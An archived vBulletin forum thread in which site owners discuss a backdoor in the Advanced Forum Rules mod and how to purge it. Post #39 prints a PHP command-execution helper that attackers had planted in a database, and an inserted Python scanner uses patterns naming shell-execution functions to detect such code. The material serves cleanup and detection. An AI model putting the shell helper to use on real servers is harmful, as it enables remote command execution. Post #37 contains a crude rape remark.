The Archive of Official vBulletin Modifications Site. It is not a VB3 engine, just a parsed copy!

#31
Ugh! Again? I just got the email as well. Wonder what's wrong now? >< Poor Valter.

#32
I keep reading "hacked by team Anus".

#33
For future reference, don't PM. I'm told the correct thing to do would have been to click on "Report this Post" in the mod thread.

#34
Quote:
uninstall this rotten back door to hell. it is now without a doubt that it has not been fixed, no matter the claims. it's getting to the point where you have to wonder if it's some kind of conspiracy or something. :down: it is not a case where they breached before and were "waiting". i was only hacked after i upgraded to v4.0.4 and not before. UNINSTALL ANY AND ALL MODS - PERIOD!!

#35
Removing all mods is a little extreme, don't you think?

#36
While I do understand your frustration about everything, I kind of agree with Boofo here. Uninstalling every mod is a little extreme.

#37
yeah, sure. i suppose you could change that to all cyb mods.
but in my case i only ever used one mod. the cyb afr one. i uninstalled it and also decided to keep my vb forum vanilla. apart from changing colors and stuff from within it, that is it for me. lesson learned. i'm too much a control freak to allow myself to be "violated" again. :P (one rape is enough)

#38
Quote:
If you were hacked again - you didn't completely purge the server of the exploitable code. Ensure that all copies of vba.php have been removed:
/forum/includes/vba.php
/forum/includes/xml/vba.php
Also - check (or get your host to check) your server logs for access. Also - do a full scan of the database; as we had base64 data encoded into the database in the rtable field within the guest table. Entries I removed:
| guestid | hostip | useragent | lastactive | spider | script | rdata |
...cont'd in next post due to character limits

#39
One way people make mass changes of that nature is to use a mass defacer script. In part the code I removed from the database did allow for php or shell commands to be executed without placing files into the account. One occurrence was at: Tue May 10 07:58:35 CDT 2011 by this IP: 183.99.33.109
Code:
echo "v0pCr3w ";
echo "sys:".php_uname()." ";
$cmd="echo nob0dyCr3w";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
    $res = '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}
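
An added example, not part of the original posts: one way to automate the database scan described in posts #38 and #39. It parses the PHP-serialized rdata value (strings are length-prefixed, so splitting on quotes is unreliable) and flags string fields that hold PHP code markers, either directly or after base64 decoding. The marker patterns, function names and sample rows are assumptions constructed for illustration.

```python
import base64
import re
CODE = re.compile(rb"<\?php|\b(?:eval|exec|shell_exec|system|passthru|popen)\s*\(", re.I)
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}")     # both patterns are illustrative assumptions
HEAD = re.compile(rb"([isa]):(-?\d+)[;:]")       # type tag plus its number

def php_unserialize(data, pos=0):                # handles i, s and a; returns (value, next_pos)
    m = HEAD.match(data, pos)
    if not m:
        raise ValueError(f"unsupported or malformed value at offset {pos}")
    tag, n, pos = m.group(1), int(m.group(2)), m.end()
    if tag == b"i":
        return n, pos
    if tag == b"s":                              # length-prefixed, so embedded quotes are fine
        if data[pos + n + 1:pos + n + 3] != b'";':
            raise ValueError("truncated string")
        return data[pos + 1:pos + n + 1], pos + n + 3
    out, pos = {}, pos + 1                       # skip the opening {
    for _ in range(n):
        key, pos = php_unserialize(data, pos)
        out[key], pos = php_unserialize(data, pos)
    return out, pos + 1                          # skip the closing }

def suspicious_reason(value):
    if CODE.search(value):
        return "php-code"
    decoded = (base64.b64decode(r[:len(r) // 4 * 4]) for r in B64_RUN.findall(value))
    return "base64-php-code" if any(map(CODE.search, decoded)) else None

def scan_rows(rows):                             # rows: (guestid, hostip, rdata as bytes)
    findings = []
    for guestid, hostip, rdata in rows:
        try:
            fields = php_unserialize(rdata)[0].items()
        except (ValueError, AttributeError):
            findings.append((guestid, hostip, None, "unparseable"))
            continue
        for key, val in fields:                  # flat array; nested arrays are not descended
            if isinstance(val, bytes) and (why := suspicious_reason(val)):
                name = key.decode("latin-1") if isinstance(key, bytes) else str(key)
                findings.append((guestid, hostip, name, why))
    return findings

def _row(author):                                # constructed rdata in the contact-form shape
    return b'a:2:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:%d:"%s";}' % (len(author), author)
SAMPLE_ROWS = [                                  # constructed: documentation IPs, harmless payloads
    ("guest-a", "192.0.2.10", _row(b"Alice")),
    ("guest-b", "192.0.2.20", _row(base64.b64encode(b'<?php echo "constructed sample"; ?>'))),
    ("guest-c", "192.0.2.30", _row(b"<?php echo 1; ?>")),
]
```

Rows reported as "unparseable" deserve a manual look as well, since a length prefix that no longer matches its string usually means the value was truncated or edited.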

#40
Anyone who was using the old version of the Advanced Forum Rules mod, any version, could/was suspect to hackers. There is a fixed update somewhere. Best thing to do is uninstall the mod, remove all files from the server, and re-upload the updated version.